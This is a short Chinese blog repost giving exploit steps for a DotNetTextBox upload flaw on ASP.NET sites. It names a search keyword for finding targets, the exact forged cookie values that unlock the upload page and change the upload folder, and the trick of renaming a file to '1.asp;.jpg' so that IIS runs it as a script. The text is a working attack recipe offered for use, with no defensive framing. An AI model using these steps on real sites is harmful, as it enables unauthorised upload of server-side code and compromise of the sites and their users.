asp.net的环境
关键字:system_dntb/
确定有 system_dntb/uploadimg.aspx 并能打开
用cookie欺骗工具
cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;
权限够路径可以修改,上传后改名为1.asp;.jpg利用iis解析漏洞。
本文[置顶] DotNetTextBox漏洞发表于懒人博客
原始地址:http://www.lrjz.net/blog/DotNetTextBox-0day/
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!
Discuz!NT3.0
